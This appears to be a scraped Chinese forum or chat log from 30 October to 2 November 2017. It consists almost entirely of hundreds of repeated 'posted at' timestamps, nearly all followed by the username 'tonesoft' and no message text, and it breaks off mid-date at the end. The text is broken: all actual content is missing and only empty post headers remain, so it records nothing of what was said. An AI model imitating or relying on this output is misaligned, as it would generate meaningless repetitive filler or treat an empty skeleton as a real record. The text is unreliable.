發表于 - 2017-10-30 08:47:46
tonesoft :
發表于 - 2017-10-30 08:48:20
tonesoft :
發表于 - 2017-10-30 08:51:08
tonesoft :
發表于 - 2017-10-30 08:51:48
tonesoft :
發表于 - 2017-10-30 08:53:20
tonesoft :
發表于 - 2017-10-30 08:55:42
tonesoft :
發表于 - 2017-10-30 08:58:25
tonesoft :
發表于 - 2017-10-30 08:59:13
tonesoft :
發表于 - 2017-10-30 09:00:35
tonesoft :
發表于 - 2017-10-30 09:02:00
tonesoft :
發表于 - 2017-10-30 09:02:01
tonesoft :
發表于 - 2017-10-30 09:02:42
tonesoft :
發表于 - 2017-10-30 09:05:28
tonesoft :
發表于 - 2017-10-30 09:05:43
tonesoft :
發表于 - 2017-10-30 09:08:57
tonesoft :
發表于 - 2017-10-30 09:09:11
tonesoft :
發表于 - 2017-10-30 09:12:03
tonesoft :
發表于 - 2017-10-30 09:12:54
tonesoft :
發表于 - 2017-10-30 09:14:18
tonesoft :
發表于 - 2017-10-30 09:14:32
tonesoft :
發表于 - 2017-10-30 09:15:46
tonesoft :
發表于 - 2017-10-30 09:15:49
tonesoft :
發表于 - 2017-10-30 09:15:58
tonesoft :
發表于 - 2017-10-30 09:16:00
tonesoft :
發表于 - 2017-10-30 09:16:40
tonesoft :
發表于 - 2017-10-30 09:16:58
tonesoft :
發表于 - 2017-10-30 09:18:08
tonesoft :
發表于 - 2017-10-30 09:19:24
tonesoft :
發表于 - 2017-10-30 09:19:41
tonesoft :
發表于 - 2017-10-30 09:20:37
tonesoft :
發表于 - 2017-10-30 09:24:11
tonesoft :
發表于 - 2017-10-30 09:24:17
tonesoft :
發表于 - 2017-10-30 09:24:50
tonesoft :
發表于 - 2017-10-30 09:27:13
tonesoft :
發表于 - 2017-10-30 09:34:44
tonesoft :
發表于 - 2017-10-30 09:39:50
tonesoft :
發表于 - 2017-10-30 09:54:21
tonesoft :
發表于 - 2017-10-30 10:11:56
tonesoft :
發表于 - 2017-10-30 10:14:02
tonesoft :
發表于 - 2017-10-30 10:14:50
tonesoft :
發表于 - 2017-10-30 10:15:23
tonesoft :
發表于 - 2017-10-30 10:17:09
tonesoft :
發表于 - 2017-10-30 10:17:53
tonesoft :
發表于 - 2017-10-30 10:17:58
tonesoft :
發表于 - 2017-10-30 10:21:15
tonesoft :
發表于 - 2017-10-30 10:21:54
tonesoft :
發表于 - 2017-10-30 10:23:10
tonesoft :
發表于 - 2017-10-30 11:07:39
tonesoft :
發表于 - 2017-10-30 11:10:25
tonesoft :
發表于 - 2017-10-30 11:12:30
tonesoft :
發表于 - 2017-10-30 11:13:03
tonesoft :
發表于 - 2017-10-30 11:14:37
tonesoft :
發表于 - 2017-10-30 11:18:11
tonesoft :
發表于 - 2017-10-30 11:21:28
tonesoft :
發表于 - 2017-10-30 11:22:16
tonesoft :
發表于 - 2017-10-30 11:28:55
tonesoft :
發表于 - 2017-10-30 11:33:00
tonesoft :
發表于 - 2017-10-30 11:35:30
tonesoft :
發表于 - 2017-10-30 11:35:43
tonesoft :
發表于 - 2017-10-30 11:51:15
tonesoft :
發表于 - 2017-10-30 11:56:23
tonesoft :
發表于 - 2017-10-30 12:10:30
tonesoft :
發表于 - 2017-10-30 12:15:12
tonesoft :
發表于 - 2017-10-30 12:16:37
tonesoft :
發表于 - 2017-10-30 12:20:21
tonesoft :
發表于 - 2017-10-30 12:24:12
tonesoft :
發表于 - 2017-10-30 12:27:06
tonesoft :
發表于 - 2017-10-30 12:29:51
tonesoft :
發表于 - 2017-10-30 12:37:54
tonesoft :
發表于 - 2017-10-30 12:53:36
tonesoft :
發表于 - 2017-10-30 13:02:01
tonesoft :
發表于 - 2017-10-30 13:06:03
tonesoft :
發表于 - 2017-10-30 13:08:19
tonesoft :
發表于 - 2017-10-30 13:14:39
tonesoft :
發表于 - 2017-10-30 13:18:50
tonesoft :
發表于 - 2017-10-30 13:28:31
tonesoft :
發表于 - 2017-10-30 13:30:25
tonesoft :
發表于 - 2017-10-30 13:32:41
tonesoft :
發表于 - 2017-10-30 13:33:15
tonesoft :
發表于 - 2017-10-30 13:43:31
tonesoft :
發表于 - 2017-10-30 13:49:32
tonesoft :
發表于 - 2017-10-30 13:52:49
tonesoft :
發表于 - 2017-10-30 14:02:06
tonesoft :
發表于 - 2017-10-30 14:03:50
tonesoft :
發表于 - 2017-10-30 14:19:21
tonesoft :
發表于 - 2017-10-30 14:28:12
tonesoft :
發表于 - 2017-10-30 14:30:18
tonesoft :
發表于 - 2017-10-30 14:30:44
tonesoft :
發表于 - 2017-10-30 14:40:12
tonesoft :
發表于 - 2017-10-30 14:40:19
tonesoft :
發表于 - 2017-10-30 14:43:10
tonesoft :
發表于 - 2017-10-30 14:49:54
tonesoft :
發表于 - 2017-10-30 14:52:22
tonesoft :
發表于 - 2017-10-30 14:56:25
tonesoft :
發表于 - 2017-10-30 14:57:06
tonesoft :
發表于 - 2017-10-30 14:58:22
tonesoft :
發表于 - 2017-10-30 15:06:09
tonesoft :
發表于 - 2017-10-30 15:13:37
tonesoft :
發表于 - 2017-10-30 15:26:35
tonesoft :
發表于 - 2017-10-30 15:30:16
tonesoft :
發表于 - 2017-10-30 15:55:38
tonesoft :
發表于 - 2017-10-30 15:58:02
tonesoft :
發表于 - 2017-10-30 16:00:24
tonesoft :
發表于 - 2017-10-30 16:03:42
tonesoft :
發表于 - 2017-10-30 16:04:37
tonesoft :
發表于 - 2017-10-30 16:12:25
tonesoft :
發表于 - 2017-10-30 16:14:21
tonesoft :
發表于 - 2017-10-30 16:19:27
tonesoft :
發表于 - 2017-10-30 16:23:47
tonesoft :
發表于 - 2017-10-30 16:41:04
tonesoft :
發表于 - 2017-10-30 16:55:20
tonesoft :
發表于 - 2017-10-30 16:55:47
tonesoft :
發表于 - 2017-10-30 16:58:01
tonesoft :
發表于 - 2017-10-30 16:59:55
tonesoft :
發表于 - 2017-10-30 17:08:32
tonesoft :
發表于 - 2017-10-30 17:12:19
tonesoft :
發表于 - 2017-10-30 17:14:16
tonesoft :
發表于 - 2017-10-30 17:17:29
tonesoft :
發表于 - 2017-10-30 17:24:35
tonesoft :
發表于 - 2017-10-30 17:32:43
tonesoft :
發表于 - 2017-10-30 17:40:42
tonesoft :
發表于 - 2017-10-30 17:40:47
tonesoft :
發表于 - 2017-10-30 17:44:39
tonesoft :
發表于 - 2017-10-30 17:45:03
tonesoft :
發表于 - 2017-10-30 17:45:52
tonesoft :
發表于 - 2017-10-30 17:48:55
tonesoft :
發表于 - 2017-10-30 17:52:53
tonesoft :
發表于 - 2017-10-30 17:55:08
tonesoft :
發表于 - 2017-10-30 17:57:48
tonesoft :
發表于 - 2017-10-30 18:05:20
發表于 - 2017-10-30 18:08:32
tonesoft :
發表于 - 2017-10-30 18:18:23
tonesoft :
發表于 - 2017-10-30 18:28:41
tonesoft :
發表于 - 2017-10-30 18:33:15
tonesoft :
發表于 - 2017-10-30 18:34:08
tonesoft :
發表于 - 2017-10-30 18:46:28
tonesoft :
發表于 - 2017-10-30 18:57:53
tonesoft :
發表于 - 2017-10-30 19:07:43
tonesoft :
發表于 - 2017-10-30 19:09:26
tonesoft :
發表于 - 2017-10-30 19:10:27
tonesoft :
發表于 - 2017-10-30 19:11:33
tonesoft :
發表于 - 2017-10-30 19:12:12
tonesoft :
發表于 - 2017-10-30 19:13:28
tonesoft :
發表于 - 2017-10-30 19:17:39
tonesoft :
發表于 - 2017-10-30 19:22:40
tonesoft :
發表于 - 2017-10-30 19:27:14
tonesoft :
發表于 - 2017-10-30 19:29:21
tonesoft :
發表于 - 2017-10-30 19:36:43
tonesoft :
發表于 - 2017-10-30 19:36:59
tonesoft :
發表于 - 2017-10-30 19:38:47
tonesoft :
發表于 - 2017-10-30 19:41:56
tonesoft :
發表于 - 2017-10-30 19:42:49
tonesoft :
發表于 - 2017-10-30 19:43:20
tonesoft :
發表于 - 2017-10-30 19:50:52
tonesoft :
發表于 - 2017-10-30 19:51:14
tonesoft :
發表于 - 2017-10-30 19:56:03
tonesoft :
發表于 - 2017-10-30 19:58:14
tonesoft :
發表于 - 2017-10-30 20:00:01
tonesoft :
發表于 - 2017-10-30 20:00:52
tonesoft :
發表于 - 2017-10-30 20:01:03
tonesoft :
發表于 - 2017-10-30 20:08:38
tonesoft :
發表于 - 2017-10-30 20:10:57
tonesoft :
發表于 - 2017-10-30 20:11:39
tonesoft :
發表于 - 2017-10-30 20:13:18
tonesoft :
發表于 - 2017-10-30 20:18:59
tonesoft :
發表于 - 2017-10-30 20:22:37
tonesoft :
發表于 - 2017-10-30 20:26:47
tonesoft :
發表于 - 2017-10-30 20:27:15
tonesoft :
發表于 - 2017-10-30 20:28:58
tonesoft :
發表于 - 2017-10-30 20:32:28
tonesoft :
發表于 - 2017-10-30 20:37:46
tonesoft :
發表于 - 2017-10-30 21:01:56
tonesoft :
發表于 - 2017-10-30 21:18:08
tonesoft :
發表于 - 2017-10-30 21:19:46
tonesoft :
發表于 - 2017-10-31 06:56:56
tonesoft :
發表于 - 2017-10-31 06:57:03
tonesoft :
發表于 - 2017-10-31 07:05:49
tonesoft :
發表于 - 2017-10-31 07:11:26
tonesoft :
發表于 - 2017-10-31 07:12:15
tonesoft :
發表于 - 2017-10-31 07:15:22
tonesoft :
發表于 - 2017-10-31 07:17:17
tonesoft :
發表于 - 2017-10-31 07:34:58
tonesoft :
發表于 - 2017-10-31 07:35:26
tonesoft :
發表于 - 2017-10-31 07:49:04
tonesoft :
發表于 - 2017-10-31 07:51:36
tonesoft :
發表于 - 2017-10-31 07:56:28
tonesoft :
發表于 - 2017-10-31 08:01:22
tonesoft :
發表于 - 2017-10-31 08:03:44
tonesoft :
發表于 - 2017-10-31 08:04:36
tonesoft :
發表于 - 2017-10-31 08:17:20
tonesoft :
發表于 - 2017-10-31 08:18:20
tonesoft :
發表于 - 2017-10-31 08:20:22
tonesoft :
發表于 - 2017-10-31 08:23:38
tonesoft :
發表于 - 2017-10-31 08:24:14
tonesoft :
發表于 - 2017-10-31 08:26:44
tonesoft :
發表于 - 2017-10-31 08:52:30
tonesoft :
發表于 - 2017-10-31 08:53:37
tonesoft :
發表于 - 2017-10-31 08:56:36
tonesoft :
發表于 - 2017-10-31 08:58:16
tonesoft :
發表于 - 2017-10-31 08:58:57
tonesoft :
發表于 - 2017-10-31 09:08:37
tonesoft :
發表于 - 2017-10-31 09:11:30
tonesoft :
發表于 - 2017-10-31 09:14:33
tonesoft :
發表于 - 2017-10-31 09:19:23
tonesoft :
發表于 - 2017-10-31 09:20:13
tonesoft :
發表于 - 2017-10-31 09:22:57
tonesoft :
發表于 - 2017-10-31 09:25:23
tonesoft :
發表于 - 2017-10-31 09:43:50
tonesoft :
發表于 - 2017-10-31 09:46:03
tonesoft :
發表于 - 2017-10-31 09:48:12
tonesoft :
發表于 - 2017-10-31 09:48:17
tonesoft :
發表于 - 2017-10-31 09:57:12
tonesoft :
發表于 - 2017-10-31 10:06:57
tonesoft :
發表于 - 2017-10-31 10:20:33
tonesoft :
發表于 - 2017-10-31 10:24:59
tonesoft :
發表于 - 2017-10-31 10:26:20
tonesoft :
發表于 - 2017-10-31 10:28:29
tonesoft :
發表于 - 2017-10-31 10:32:21
tonesoft :
發表于 - 2017-10-31 10:40:53
tonesoft :
發表于 - 2017-10-31 10:42:08
tonesoft :
發表于 - 2017-10-31 10:45:56
tonesoft :
發表于 - 2017-10-31 10:47:04
tonesoft :
發表于 - 2017-10-31 10:49:00
tonesoft :
發表于 - 2017-10-31 10:50:26
tonesoft :
發表于 - 2017-10-31 10:51:18
tonesoft :
發表于 - 2017-10-31 10:52:57
tonesoft :
發表于 - 2017-10-31 11:04:55
tonesoft :
發表于 - 2017-10-31 11:06:00
tonesoft :
發表于 - 2017-10-31 11:14:18
tonesoft :
發表于 - 2017-10-31 11:17:29
tonesoft :
發表于 - 2017-10-31 11:17:53
tonesoft :
發表于 - 2017-10-31 11:18:25
tonesoft :
發表于 - 2017-10-31 11:19:00
tonesoft :
發表于 - 2017-10-31 11:19:53
tonesoft :
發表于 - 2017-10-31 11:24:11
tonesoft :
發表于 - 2017-10-31 11:25:13
tonesoft :
發表于 - 2017-10-31 11:35:34
tonesoft :
發表于 - 2017-10-31 11:36:30
tonesoft :
發表于 - 2017-10-31 11:39:40
tonesoft :
發表于 - 2017-10-31 11:42:13
tonesoft :
發表于 - 2017-10-31 11:42:36
tonesoft :
發表于 - 2017-10-31 11:47:01
tonesoft :
發表于 - 2017-10-31 11:48:14
tonesoft :
發表于 - 2017-10-31 11:56:12
tonesoft :
發表于 - 2017-10-31 11:59:15
tonesoft :
發表于 - 2017-10-31 12:05:02
tonesoft :
發表于 - 2017-10-31 12:06:25
tonesoft :
發表于 - 2017-10-31 12:12:50
tonesoft :
發表于 - 2017-10-31 12:13:10
tonesoft :
發表于 - 2017-10-31 12:21:46
tonesoft :
發表于 - 2017-10-31 12:27:20
tonesoft :
發表于 - 2017-10-31 12:29:08
tonesoft :
發表于 - 2017-10-31 12:35:27
tonesoft :
發表于 - 2017-10-31 12:35:33
tonesoft :
發表于 - 2017-10-31 12:37:04
tonesoft :
發表于 - 2017-10-31 12:38:52
tonesoft :
發表于 - 2017-10-31 12:45:01
tonesoft :
發表于 - 2017-10-31 12:45:36
tonesoft :
發表于 - 2017-10-31 12:48:52
tonesoft :
發表于 - 2017-10-31 12:51:19
tonesoft :
發表于 - 2017-10-31 12:51:39
tonesoft :
發表于 - 2017-10-31 13:01:23
tonesoft :
發表于 - 2017-10-31 13:02:22
tonesoft :
發表于 - 2017-10-31 13:09:04
tonesoft :
發表于 - 2017-10-31 13:14:19
tonesoft :
發表于 - 2017-10-31 13:19:59
tonesoft :
發表于 - 2017-10-31 13:20:26
tonesoft :
發表于 - 2017-10-31 13:22:20
tonesoft :
發表于 - 2017-10-31 13:27:30
tonesoft :
發表于 - 2017-10-31 13:43:29
tonesoft :
發表于 - 2017-10-31 13:47:33
tonesoft :
發表于 - 2017-10-31 13:48:09
tonesoft :
發表于 - 2017-10-31 13:53:29
tonesoft :
發表于 - 2017-10-31 14:03:29
tonesoft :
發表于 - 2017-10-31 14:04:23
tonesoft :
發表于 - 2017-10-31 14:11:20
tonesoft :
發表于 - 2017-10-31 14:14:52
tonesoft :
發表于 - 2017-10-31 14:19:44
tonesoft :
發表于 - 2017-10-31 14:25:46
tonesoft :
發表于 - 2017-10-31 14:27:48
tonesoft :
發表于 - 2017-10-31 14:28:34
tonesoft :
發表于 - 2017-10-31 14:29:11
tonesoft :
發表于 - 2017-10-31 14:31:25
tonesoft :
發表于 - 2017-10-31 14:32:50
tonesoft :
發表于 - 2017-10-31 14:34:07
tonesoft :
發表于 - 2017-10-31 14:41:38
tonesoft :
發表于 - 2017-10-31 14:47:06
tonesoft :
發表于 - 2017-10-31 14:51:40
tonesoft :
發表于 - 2017-10-31 15:00:15
tonesoft :
發表于 - 2017-10-31 15:02:01
tonesoft :
發表于 - 2017-10-31 15:04:54
tonesoft :
發表于 - 2017-10-31 15:06:04
tonesoft :
發表于 - 2017-10-31 15:06:21
tonesoft :
發表于 - 2017-10-31 15:11:15
tonesoft :
發表于 - 2017-10-31 15:11:23
tonesoft :
發表于 - 2017-10-31 15:14:02
tonesoft :
發表于 - 2017-10-31 15:16:58
tonesoft :
發表于 - 2017-10-31 15:20:05
tonesoft :
發表于 - 2017-10-31 15:22:20
tonesoft :
發表于 - 2017-10-31 15:29:43
tonesoft :
發表于 - 2017-10-31 15:34:15
tonesoft :
發表于 - 2017-10-31 15:42:49
tonesoft :
發表于 - 2017-10-31 15:54:19
tonesoft :
發表于 - 2017-10-31 16:18:08
tonesoft :
發表于 - 2017-10-31 16:20:10
tonesoft :
發表于 - 2017-10-31 16:45:49
tonesoft :
發表于 - 2017-10-31 17:04:33
tonesoft :
發表于 - 2017-10-31 17:06:38
tonesoft :
發表于 - 2017-10-31 17:08:11
tonesoft :
發表于 - 2017-10-31 17:10:05
tonesoft :
發表于 - 2017-10-31 17:18:23
tonesoft :
發表于 - 2017-10-31 17:20:14
tonesoft :
發表于 - 2017-10-31 17:30:55
tonesoft :
發表于 - 2017-10-31 17:35:46
tonesoft :
發表于 - 2017-10-31 17:43:18
tonesoft :
發表于 - 2017-10-31 17:58:10
tonesoft :
發表于 - 2017-10-31 17:58:49
tonesoft :
發表于 - 2017-10-31 18:07:16
tonesoft :
發表于 - 2017-10-31 18:13:22
tonesoft :
發表于 - 2017-10-31 18:13:36
tonesoft :
發表于 - 2017-10-31 18:15:32
tonesoft :
發表于 - 2017-10-31 18:19:04
tonesoft :
發表于 - 2017-10-31 18:21:33
tonesoft :
發表于 - 2017-10-31 18:21:40
tonesoft :
發表于 - 2017-10-31 18:24:01
tonesoft :
發表于 - 2017-10-31 18:28:56
tonesoft :
發表于 - 2017-10-31 18:34:02
tonesoft :
發表于 - 2017-10-31 18:34:12
tonesoft :
發表于 - 2017-10-31 18:37:21
tonesoft :
發表于 - 2017-10-31 18:38:16
tonesoft :
發表于 - 2017-10-31 18:39:53
tonesoft :
發表于 - 2017-10-31 18:41:56
tonesoft :
發表于 - 2017-10-31 18:42:00
tonesoft :
發表于 - 2017-10-31 18:42:50
tonesoft :
發表于 - 2017-10-31 18:44:51
tonesoft :
發表于 - 2017-10-31 19:07:47
tonesoft :
發表于 - 2017-10-31 19:09:24
tonesoft :
發表于 - 2017-10-31 19:16:16
tonesoft :
發表于 - 2017-10-31 19:19:57
tonesoft :
發表于 - 2017-10-31 19:49:51
tonesoft :
發表于 - 2017-10-31 19:51:35
tonesoft :
發表于 - 2017-10-31 19:57:36
tonesoft :
發表于 - 2017-10-31 19:58:03
tonesoft :
發表于 - 2017-10-31 20:04:13
tonesoft :
發表于 - 2017-10-31 20:04:51
tonesoft :
發表于 - 2017-10-31 20:12:09
tonesoft :
發表于 - 2017-10-31 20:18:15
tonesoft :
發表于 - 2017-10-31 20:19:03
tonesoft :
發表于 - 2017-11-01 00:17:55
tonesoft :
發表于 - 2017-11-01 01:35:10
tonesoft :
發表于 - 2017-11-01 01:48:08
tonesoft :
發表于 - 2017-11-01 01:49:39
tonesoft :
發表于 - 2017-11-01 01:50:03
tonesoft :
發表于 - 2017-11-01 01:55:28
tonesoft :
發表于 - 2017-11-01 02:00:09
tonesoft :
發表于 - 2017-11-01 02:04:02
tonesoft :
發表于 - 2017-11-01 02:04:13
tonesoft :
發表于 - 2017-11-01 02:10:42
tonesoft :
發表于 - 2017-11-01 02:11:51
tonesoft :
發表于 - 2017-11-01 02:12:22
tonesoft :
發表于 - 2017-11-01 02:16:23
tonesoft :
發表于 - 2017-11-01 02:21:26
tonesoft :
發表于 - 2017-11-01 02:23:21
tonesoft :
發表于 - 2017-11-01 02:23:52
tonesoft :
發表于 - 2017-11-01 02:28:43
tonesoft :
發表于 - 2017-11-01 02:30:12
tonesoft :
發表于 - 2017-11-01 02:33:45
tonesoft :
發表于 - 2017-11-01 02:35:29
tonesoft :
發表于 - 2017-11-01 02:36:59
tonesoft :
發表于 - 2017-11-01 02:40:46
tonesoft :
發表于 - 2017-11-01 02:41:58
tonesoft :
發表于 - 2017-11-01 02:42:20
tonesoft :
發表于 - 2017-11-01 02:42:43
tonesoft :
發表于 - 2017-11-01 02:43:08
tonesoft :
發表于 - 2017-11-01 02:43:46
tonesoft :
發表于 - 2017-11-01 02:45:19
tonesoft :
發表于 - 2017-11-01 02:46:49
tonesoft :
發表于 - 2017-11-01 02:51:13
tonesoft :
發表于 - 2017-11-01 02:54:48
tonesoft :
發表于 - 2017-11-01 02:55:53
tonesoft :
發表于 - 2017-11-01 02:56:32
tonesoft :
發表于 - 2017-11-01 02:57:46
tonesoft :
發表于 - 2017-11-01 02:58:39
tonesoft :
發表于 - 2017-11-01 03:03:27
tonesoft :
發表于 - 2017-11-01 03:04:51
tonesoft :
發表于 - 2017-11-01 03:05:48
tonesoft :
發表于 - 2017-11-01 03:08:43
tonesoft :
發表于 - 2017-11-01 03:22:37
tonesoft :
發表于 - 2017-11-01 03:26:06
tonesoft :
發表于 - 2017-11-01 03:27:50
tonesoft :
發表于 - 2017-11-01 03:35:04
tonesoft :
發表于 - 2017-11-01 03:53:07
tonesoft :
發表于 - 2017-11-01 03:53:11
tonesoft :
發表于 - 2017-11-01 03:53:41
tonesoft :
發表于 - 2017-11-01 03:56:09
tonesoft :
發表于 - 2017-11-01 03:57:42
tonesoft :
發表于 - 2017-11-01 03:59:16
tonesoft :
發表于 - 2017-11-01 04:05:07
tonesoft :
發表于 - 2017-11-01 04:05:52
tonesoft :
發表于 - 2017-11-01 04:09:22
tonesoft :
發表于 - 2017-11-01 04:18:48
tonesoft :
發表于 - 2017-11-01 04:37:43
tonesoft :
發表于 - 2017-11-01 04:44:21
tonesoft :
發表于 - 2017-11-01 04:54:37
tonesoft :
發表于 - 2017-11-01 04:58:14
tonesoft :
發表于 - 2017-11-01 04:59:13
tonesoft :
發表于 - 2017-11-01 05:00:07
tonesoft :
發表于 - 2017-11-01 05:00:33
tonesoft :
發表于 - 2017-11-01 05:00:46
tonesoft :
發表于 - 2017-11-01 05:00:53
tonesoft :
發表于 - 2017-11-01 05:09:02
tonesoft :
發表于 - 2017-11-01 05:09:05
tonesoft :
發表于 - 2017-11-01 05:09:25
tonesoft :
發表于 - 2017-11-01 05:17:07
tonesoft :
發表于 - 2017-11-01 05:19:12
tonesoft :
發表于 - 2017-11-01 05:19:14
tonesoft :
發表于 - 2017-11-01 05:19:22
tonesoft :
發表于 - 2017-11-01 05:23:44
tonesoft :
發表于 - 2017-11-01 05:35:40
tonesoft :
發表于 - 2017-11-01 05:46:53
tonesoft :
發表于 - 2017-11-01 05:48:13
tonesoft :
發表于 - 2017-11-01 05:51:35
tonesoft :
發表于 - 2017-11-01 06:02:48
tonesoft :
發表于 - 2017-11-01 06:08:35
tonesoft :
發表于 - 2017-11-01 06:08:35
tonesoft :
發表于 - 2017-11-01 06:08:40
tonesoft :
發表于 - 2017-11-01 06:10:08
tonesoft :
發表于 - 2017-11-01 06:10:42
tonesoft :
發表于 - 2017-11-01 06:24:02
tonesoft :
發表于 - 2017-11-01 06:24:39
tonesoft :
發表于 - 2017-11-01 06:24:53
tonesoft :
發表于 - 2017-11-01 06:25:30
tonesoft :
發表于 - 2017-11-01 06:25:42
tonesoft :
發表于 - 2017-11-01 06:26:17
tonesoft :
發表于 - 2017-11-01 06:29:00
tonesoft :
發表于 - 2017-11-01 06:32:18
tonesoft :
發表于 - 2017-11-01 06:34:58
tonesoft :
發表于 - 2017-11-01 06:38:38
tonesoft :
發表于 - 2017-11-01 06:38:48
tonesoft :
發表于 - 2017-11-01 06:42:21
tonesoft :
發表于 - 2017-11-01 06:44:09
tonesoft :
發表于 - 2017-11-01 06:49:12
tonesoft :
發表于 - 2017-11-01 06:51:39
tonesoft :
發表于 - 2017-11-01 06:51:57
tonesoft :
發表于 - 2017-11-01 07:08:49
tonesoft :
發表于 - 2017-11-01 07:28:50
tonesoft :
發表于 - 2017-11-01 07:30:41
tonesoft :
發表于 - 2017-11-01 07:41:25
tonesoft :
發表于 - 2017-11-01 07:51:18
tonesoft :
發表于 - 2017-11-01 07:55:00
tonesoft :
發表于 - 2017-11-01 08:00:52
tonesoft :
發表于 - 2017-11-01 08:04:38
tonesoft :
發表于 - 2017-11-01 08:21:00
tonesoft :
發表于 - 2017-11-01 08:24:53
tonesoft :
發表于 - 2017-11-01 08:26:07
tonesoft :
發表于 - 2017-11-01 08:32:03
tonesoft :
發表于 - 2017-11-01 08:43:50
tonesoft :
發表于 - 2017-11-01 08:43:54
tonesoft :
發表于 - 2017-11-01 08:49:01
tonesoft :
發表于 - 2017-11-01 08:57:28
tonesoft :
發表于 - 2017-11-01 09:08:09
tonesoft :
發表于 - 2017-11-01 09:08:30
tonesoft :
發表于 - 2017-11-01 09:11:38
tonesoft :
發表于 - 2017-11-01 09:27:17
tonesoft :
發表于 - 2017-11-01 09:46:55
tonesoft :
發表于 - 2017-11-01 09:50:35
tonesoft :
發表于 - 2017-11-01 10:00:07
tonesoft :
發表于 - 2017-11-01 10:01:26
tonesoft :
發表于 - 2017-11-01 10:04:56
tonesoft :
發表于 - 2017-11-01 10:07:19
tonesoft :
發表于 - 2017-11-01 10:09:38
tonesoft :
發表于 - 2017-11-01 10:11:44
tonesoft :
發表于 - 2017-11-01 10:34:44
tonesoft :
發表于 - 2017-11-01 10:37:13
tonesoft :
發表于 - 2017-11-01 10:39:55
tonesoft :
發表于 - 2017-11-01 10:53:18
tonesoft :
發表于 - 2017-11-01 11:06:10
tonesoft :
發表于 - 2017-11-01 11:08:40
tonesoft :
發表于 - 2017-11-01 11:13:09
tonesoft :
發表于 - 2017-11-01 11:18:08
tonesoft :
發表于 - 2017-11-01 11:45:55
tonesoft :
發表于 - 2017-11-01 11:59:58
tonesoft :
發表于 - 2017-11-01 13:02:55
tonesoft :
發表于 - 2017-11-01 13:09:17
tonesoft :
發表于 - 2017-11-01 13:13:28
tonesoft :
發表于 - 2017-11-01 13:19:46
tonesoft :
發表于 - 2017-11-01 13:28:39
tonesoft :
發表于 - 2017-11-01 13:38:43
tonesoft :
發表于 - 2017-11-01 14:18:29
tonesoft :
發表于 - 2017-11-01 14:19:32
tonesoft :
發表于 - 2017-11-01 15:21:52
tonesoft :
發表于 - 2017-11-01 15:40:55
tonesoft :
發表于 - 2017-11-01 15:41:51
tonesoft :
發表于 - 2017-11-01 17:10:15
tonesoft :
發表于 - 2017-11-01 17:12:00
發表于 - 2017-11-01 17:12:14
tonesoft :
發表于 - 2017-11-01 17:31:37
tonesoft :
發表于 - 2017-11-01 17:33:20
tonesoft :
發表于 - 2017-11-01 17:43:51
tonesoft :
發表于 - 2017-11-01 17:45:33
tonesoft :
發表于 - 2017-11-01 18:10:16
tonesoft :
發表于 - 2017-11-01 18:11:42
發表于 - 2017-11-01 18:15:19
tonesoft :
發表于 - 2017-11-01 18:19:50
tonesoft :
發表于 - 2017-11-01 19:00:36
tonesoft :
發表于 - 2017-11-01 19:48:31
tonesoft :
發表于 - 2017-11-01 19:56:16
tonesoft :
發表于 - 2017-11-01 19:56:29
tonesoft :
發表于 - 2017-11-01 20:23:03
tonesoft :
發表于 - 2017-11-01 20:34:30
tonesoft :
發表于 - 2017-11-01 20:36:13
tonesoft :
發表于 - 2017-11-01 20:45:31
tonesoft :
發表于 - 2017-11-01 20:52:31
tonesoft :
發表于 - 2017-11-01 20:57:57
tonesoft :
發表于 - 2017-11-01 21:09:35
tonesoft :
發表于 - 2017-11-01 21:28:35
tonesoft :
發表于 - 2017-11-01 21:39:29
tonesoft :
發表于 - 2017-11-01 21:46:03
tonesoft :
發表于 - 2017-11-01 21:54:12
tonesoft :
發表于 - 2017-11-01 22:09:49
tonesoft :
發表于 - 2017-11-01 22:30:22
tonesoft :
發表于 - 2017-11-01 22:33:49
tonesoft :
發表于 - 2017-11-01 22:40:15
tonesoft :
發表于 - 2017-11-01 22:41:00
tonesoft :
發表于 - 2017-11-01 22:46:32
tonesoft :
發表于 - 2017-11-01 23:22:16
tonesoft :
發表于 - 2017-11-01 23:22:33
tonesoft :
發表于 - 2017-11-01 23:26:14
tonesoft :
發表于 - 2017-11-02 00:01:12
tonesoft :
發表于 - 2017-11-02 00:06:31
tonesoft :
發表于 - 2017-11-02 00:15:01
tonesoft :
發表于 - 2017-11-02 00:23:14
tonesoft :
發表于 - 2017-11-02 00:37:19
tonesoft :
發表于 - 2017-11-02 00:37:29
tonesoft :
發表于 - 2017-11-02 00:45:58
tonesoft :
發表于 - 2017-11-02 00:57:21
發表于 - 2017-11-02 01:16:22
tonesoft :
發表于 - 2017-11-02 04:51:43
tonesoft :
發表于 - 2017-11-02 05:14:28
tonesoft :
發表于 - 2017-11-02 05:27:01
tonesoft :
發表于 - 2017-11-02 05:30:20
tonesoft :
發表于 - 2017-11-02 06:00:30
tonesoft :
發表于 - 2017-11-02 06:03:13
tonesoft :
發表于 - 2017-11-02 06:31:34
tonesoft :
發表于 - 2017-11-02 06:33:34
tonesoft :
發表于 - 2017-11-02 06:34:41
tonesoft :
發表于 - 2017-11-02 06:35:57
tonesoft :
發表于 - 2017-11-02 06:39:53
tonesoft :
發表于 - 2017-11-02 06:42:39
tonesoft :
發表于 - 2017-11-02 06:45:23
tonesoft :
發表于 - 2017-11-02 06:45:31
tonesoft :
發表于 - 2017-11-02 06:54:46
tonesoft :
發表于 - 2017-11-02 06:55:30
tonesoft :
發表于 - 2017-11-02 06:55:49
tonesoft :
發表于 - 2